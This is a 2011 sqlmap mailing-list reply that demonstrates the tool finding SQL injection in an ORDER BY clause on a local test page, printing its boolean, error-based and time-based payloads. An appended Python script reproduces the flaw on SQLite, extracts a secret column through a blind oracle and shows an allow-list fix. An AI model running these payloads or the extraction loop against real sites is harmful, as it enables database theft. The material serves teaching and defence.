Hi Jacco,

On 27 April 2011 10:52, Jacco van Tuijl <jaccovantu...@gmail.com> wrote:
> I've been writing an article about SQL injection in the ORDER BY clause:
> http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
>
> Would be nice to see that implemented in version 1.0 :)
sqlmap has had support for injection in ORDER BY and GROUP BY clauses since
0.9-dev, for about six months or so now. Proof of concept:

--8<--
$ python sqlmap.py -u http://debiandev/sqlmap/mysql/get_int_orderby.php?id=1 --level 3 --flush-session

    sqlmap/1.0-dev (r3772) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:49:02

[00:49:02] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev/session' as session file
[00:49:02] [INFO] flushing session file
[00:49:02] [INFO] testing connection to the target url
[00:49:02] [INFO] heuristics detected web page charset 'ascii'
[00:49:02] [INFO] testing if the url is stable, wait a few seconds
[00:49:03] [INFO] url is stable
[00:49:03] [INFO] testing if GET parameter 'id' is dynamic
[00:49:03] [INFO] confirming that GET parameter 'id' is dynamic
[00:49:04] [INFO] GET parameter 'id' is dynamic
[00:49:04] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:49:04] [INFO] testing sql injection on GET parameter 'id'
[00:49:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace'
[00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[00:49:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[00:49:04] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[00:49:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[00:49:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' injectable
[00:49:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:49:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:49:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:49:54] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 193 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 6096*(SELECT 6096 FROM information_schema.tables) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 3210 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,110,102,58),(SELECT (CASE WHEN (3210=3210) THEN 1 ELSE 0 END)),CHAR(58,104,103,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[00:50:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[00:50:00] [INFO] Fetched data logged to text files under '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev'

[*] shutting down at: 00:50:00
--8<--

As you can see, it spotted three different SQL injection techniques against
an ORDER BY clause injection point. The original query in the PHP page is:

--8<--
$query = "SELECT * FROM users ORDER BY " . $_GET['id'];
--8<--

Like I said, this has been tested thoroughly on MySQL and on the other
DBMSs too.

> I'm also interested in joining your dev. team.

We can discuss it privately; drop us an email at d...@sqlmap.org.

Regards,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
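Added example, not part of Bernardo's mail and not sqlmap code: a Python script that reproduces the vulnerable pattern from the PHP test page ("SELECT * FROM users ORDER BY " followed by the raw parameter) against an in-memory SQLite database standing in for MySQL. It shows why an ORDER BY operand cannot simply be parameterised, how a boolean-based blind oracle works when the injection sits in ORDER BY (a CASE expression flips the sort order, the same idea behind the 'GROUP BY and ORDER BY clauses' check in the log above, without the MySQL-only information_schema error and SLEEP() tricks), how that one bit per request is enough to leak a column value character by character, and an allow-list fix. The users table, its rows and the secret column are constructed for the example.

```python
"""ORDER BY injection: vulnerable query, blind oracle, and allow-list fix.

Added illustration (not sqlmap's code, not the original PHP page). SQLite is
used as a stand-in for MySQL, so MySQL-only payloads (information_schema,
SLEEP(), RAND(0) grouping errors) are deliberately not used here.
"""
import sqlite3

# Constructed sample data (assumption: users table with id, username, secret).
SAMPLE_USERS = [
    (1, "alice", "s3cr3t"),
    (2, "bob", "hunter2"),
    (3, "admin", "Tr0ub4dor"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(conn: sqlite3.Connection, order_by: str) -> list:
    """Mirrors the PHP page: the 'id' parameter is concatenated into ORDER BY.
    A bound placeholder would not help: ORDER BY expects a column or an
    expression, not a value, which is why this pattern is so common."""
    sql = "SELECT id, username FROM users ORDER BY " + order_by
    return conn.execute(sql).fetchall()


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind test through ORDER BY. When the condition is true
    the rows come back sorted by id ascending, otherwise descending, so the
    attacker learns one bit per request from the row order alone."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    rows = vulnerable_query(conn, payload)
    return rows[0][0] == 1


def extract_secret(conn: sqlite3.Connection, username: str, max_len: int = 32) -> str:
    """Leak users.secret for one user using only the oracle: binary search over
    printable ASCII, about 7 requests per character instead of 95."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the value has no character at this position (also covers a
        # non-existent user: LENGTH(NULL) >= pos is NULL, i.e. not true).
        if not blind_oracle(conn, f"LENGTH((SELECT secret FROM users WHERE username='{username}')) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"UNICODE(SUBSTR((SELECT secret FROM users WHERE username='{username}'),{pos},1)) > {mid}")
            if blind_oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


# Allow-list fix: map the user-controlled sort key to a fixed identifier and
# never splice the raw parameter into SQL. Direction is allow-listed too.
SORT_COLUMNS = {"id": "id", "name": "username"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def is_allowed_sort(sort_key: str, direction: str) -> bool:
    return sort_key in SORT_COLUMNS and direction.lower() in SORT_DIRECTIONS


def safe_query(conn: sqlite3.Connection, sort_key: str, direction: str = "asc") -> list:
    if not is_allowed_sort(sort_key, direction):
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT id, username FROM users ORDER BY {SORT_COLUMNS[sort_key]} {SORT_DIRECTIONS[direction.lower()]}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("true condition  ->", vulnerable_query(db, "(CASE WHEN (1=1) THEN id ELSE -id END)"))
    print("false condition ->", vulnerable_query(db, "(CASE WHEN (1=2) THEN id ELSE -id END)"))
    print("leaked admin secret:", extract_secret(db, "admin"))
    print("safe, by name desc:", safe_query(db, "name", "desc"))
    print("payload accepted by safe_query?", is_allowed_sort("(CASE WHEN (1=1) THEN id ELSE -id END)", "asc"))
```

The oracle here flips the sort direction; sqlmap's MySQL payload above instead puts an error-raising subquery in the ELSE branch, so a false condition breaks the page rather than reordering it. Either way the lesson is the same: the fix is not escaping but an allow-list that maps the parameter to a fixed column name.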